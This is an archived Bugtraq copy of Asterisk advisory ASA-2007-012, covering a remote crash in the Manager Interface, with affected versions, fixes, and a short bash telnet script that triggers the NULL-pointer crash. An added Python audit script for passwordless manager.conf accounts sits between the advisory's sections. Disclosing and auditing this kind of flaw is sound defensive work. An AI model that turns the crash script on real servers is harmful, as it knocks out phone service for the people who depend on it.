Bugtraq mailing list archives
ASA-2007-012: Remote Crash Vulnerability in Manager Interface
From: "Kevin P. Fleming" <kpfleming () digium com>
Date: Wed, 25 Apr 2007 14:04:30 -0500
Asterisk Project Security Advisory - ASA-2007-012
+------------------------------------------------------------------------+
| Product | Asterisk |
|---------------------+--------------------------------------------------|
| Summary | Remote Crash Vulnerability in Manager Interface |
|---------------------+--------------------------------------------------|
| Nature of Advisory | Denial of Service |
|---------------------+--------------------------------------------------|
| Susceptibility | Remote Unauthenticated Sessions |
|---------------------+--------------------------------------------------|
| Severity | Moderate |
|---------------------+--------------------------------------------------|
| Exploits Known | Yes |
|---------------------+--------------------------------------------------|
| Reported On | April 24, 2007 |
|---------------------+--------------------------------------------------|
| Reported By | Digium Technical Support |
|---------------------+--------------------------------------------------|
| Posted On | April 24, 2007 |
|---------------------+--------------------------------------------------|
| Last Updated On | April 24, 2007 |
|---------------------+--------------------------------------------------|
| Advisory Contact | russell () digium com |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Description | The Asterisk Manager Interface has a remote crash |
| | vulnerability. If a manager user is configured in |
| | manager.conf without a password, and then a connection |
| | is made that attempts to use that username and MD5 |
| | authentication, Asterisk will dereference a NULL pointer |
| | and crash. |
| | |
| | This example script shows how the crash can be |
| | triggered (each AMI action is terminated by a blank line, |
| | so every heredoc below ends with one): |
| | |
| | #!/bin/bash |
| | |
| | # Step 1: request an MD5 challenge from the manager. |
| | function text1() { |
| | cat <<- EOF |
| | action: Challenge |
| | actionid: 0# |
| | authtype: MD5 |
| | |
| | EOF |
| | } |
| | |
| | # Step 2: attempt an MD5 login as the account that has no |
| | # password; 'key' is only the advisory's placeholder value. |
| | # Asterisk dereferences a NULL pointer while handling this. |
| | function text2() { |
| | cat <<- EOF |
| | action: Login |
| | actionid: 1# |
| | key: textstringhere |
| | username: testuser |
| | authtype: MD5 |
| | |
| | EOF |
| | } |
| | |
| | # The sleeps give telnet time to connect and read the banner. |
| | (sleep 1; text1; sleep 1; text2) | telnet 127.0.0.1 5038 |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Resolution | The manager interface is not enabled by default. If it is |
| | enabled, the only way this crash can be exploited is if a |
| | user exists in manager.conf without a password. Given the |
| | conditions necessary for this problem to be exploited, |
| | the severity of this issue is marked as 'moderate'. |
| | |
| | All users of the Asterisk manager interface in affected |
| | versions should ensure that every account in manager.conf |
| | has a password (a 'secret' setting). Alternatively, the |
| | issue can be avoided by completely disabling the manager |
| | interface. |
| | |
| | Users of the manager interface are encouraged to update |
| | to the appropriate version of their Asterisk product |
| | listed in the 'Corrected In' section below. |
+------------------------------------------------------------------------+
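The precondition the resolution describes (a manager account with no password) can be checked mechanically rather than by eye. The script below is an added example for this archive page; it is not Digium's code and not part of Asterisk. It uses a small hand-written reader for Asterisk's config syntax ([section] headers with optional (!) or (template) suffixes, key = value or key => value lines, ';' comments) and runs it over a constructed sample manager.conf embedded inline. It assumes a single file with no #include directives and no ';' inside values, and it treats a blank 'secret =' the same as a missing one.

```python
"""Audit an Asterisk manager.conf for the precondition of ASA-2007-012.

Added example for this advisory page; not Digium's code and not part of
Asterisk. Assumptions: one file, no #include directives, no ';' inside
values. A blank 'secret =' is reported the same as a missing one.
"""
import re

# Constructed sample manager.conf (not from any real deployment).
# [general] turns AMI on; "ops" has a secret; "testuser" has no secret line
# at all; "empty" has a blank one. "base" is a template, not a login account.
SAMPLE_MANAGER_CONF = """\
[general]
enabled = yes
port = 5038
bindaddr = 0.0.0.0

[base](!)
read = system,call
write = system,call

[ops](base)
secret = s3cr3t-example
deny = 0.0.0.0/0.0.0.0
permit = 127.0.0.1/255.255.255.0

[testuser]            ; no secret at all
read = call
write = call

[empty]
secret =              ; key present, value blank
read = call
"""

_SECTION_RE = re.compile(r"^\[([^\]]+)\](?:\(([^)]*)\))?$")
_ASSIGN_RE = re.compile(r"^([^=]+?)\s*=>?\s*(.*)$")


def parse_asterisk_conf(text):
    """Return ({section: {key: value}}, {template section names}).

    Keys are lower-cased; a later key overwrites an earlier one. A section
    written as [name](tmpl1,tmpl2) starts with a copy of the named
    templates' keys, and [name](!) marks the section itself as a template.
    """
    sections, templates, current = {}, set(), None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()   # drop comments and whitespace
        if not line:
            continue
        m = _SECTION_RE.match(line)
        if m:
            current = m.group(1).strip()
            sections.setdefault(current, {})
            for part in (m.group(2) or "").split(","):
                part = part.strip()
                if part == "!":
                    templates.add(current)
                elif part:
                    sections[current].update(sections.get(part, {}))
            continue
        m = _ASSIGN_RE.match(line)
        if m and current is not None:
            sections[current][m.group(1).strip().lower()] = m.group(2).strip()
    return sections, templates


def manager_enabled(text):
    """True when [general] enables AMI (the advisory notes it is off by default)."""
    sections, _ = parse_asterisk_conf(text)
    value = sections.get("general", {}).get("enabled", "no")
    return value.lower() in ("yes", "true", "on", "1")


def passwordless_users(text):
    """Account sections (not [general], not templates) whose 'secret' is
    missing or blank: exactly the accounts ASA-2007-012 needs."""
    sections, templates = parse_asterisk_conf(text)
    return sorted(name for name, keys in sections.items()
                  if name != "general" and name not in templates
                  and not keys.get("secret"))


if __name__ == "__main__":
    if not manager_enabled(SAMPLE_MANAGER_CONF):
        print("AMI disabled: ASA-2007-012 is not reachable")
    for user in passwordless_users(SAMPLE_MANAGER_CONF):
        print(f"manager account without a secret: [{user}]")
```

Point the script at a real manager.conf by replacing SAMPLE_MANAGER_CONF with the file's contents; an empty result from passwordless_users, or a disabled [general] section, means the crash described above cannot be triggered regardless of version, though upgrading to a corrected release is still the proper fix.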
+------------------------------------------------------------------------+
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|------------------------------+-------------+---------------------------|
| Asterisk Open Source | 1.0.x | All versions |
|------------------------------+-------------+---------------------------|
| Asterisk Open Source | 1.2.x | All versions prior to |
| | | 1.2.18 |
|------------------------------+-------------+---------------------------|
| Asterisk Open Source | 1.4.x | All versions prior to |
| | | 1.4.3 |
|------------------------------+-------------+---------------------------|
| Asterisk Business Edition | A.x.x | All versions |
|------------------------------+-------------+---------------------------|
| Asterisk Business Edition | B.x.x | All versions up to and |
| | | including B.1.3 |
|------------------------------+-------------+---------------------------|
| AsteriskNOW | pre-release | All versions up to and |
| | | including Beta5 |
|------------------------------+-------------+---------------------------|
| Asterisk Appliance Developer | 0.x.x | All versions prior to |
| Kit | | 0.4.0 |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Corrected In |
|------------------------------------------------------------------------|
| Product | Release |
|-------------------+----------------------------------------------------|
| Asterisk Open | 1.2.18 and 1.4.3, available from |
| Source | ftp://ftp.digium.com/pub/telephony/asterisk |
|-------------------+----------------------------------------------------|
| Asterisk Business | B.1.3.3, available from the Asterisk Business |
| Edition | Edition user portal on http://www.digium.com or |
| | via Digium Technical Support |
|-------------------+----------------------------------------------------|
| AsteriskNOW | Beta6, when available from |
| | http://www.asterisknow.org/. Beta5 can use the |
| | system update feature in the appliance control |
| | panel. |
|-------------------+----------------------------------------------------|
| Asterisk | 0.4.0, available from |
| Appliance | ftp://ftp.digium.com/pub/telephony/aadk/ |
| Developer Kit | |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Links | |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Asterisk Project Security Advisories are posted at |
| http://www.asterisk.org/security. |
| |
| This document may be superseded by later versions; if so, the latest |
| version will be posted at |
| http://www.asterisk.org/files/ASA-2007-012.pdf. |
+------------------------------------------------------------------------+
Copyright (c) 2007 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its
original, unaltered form.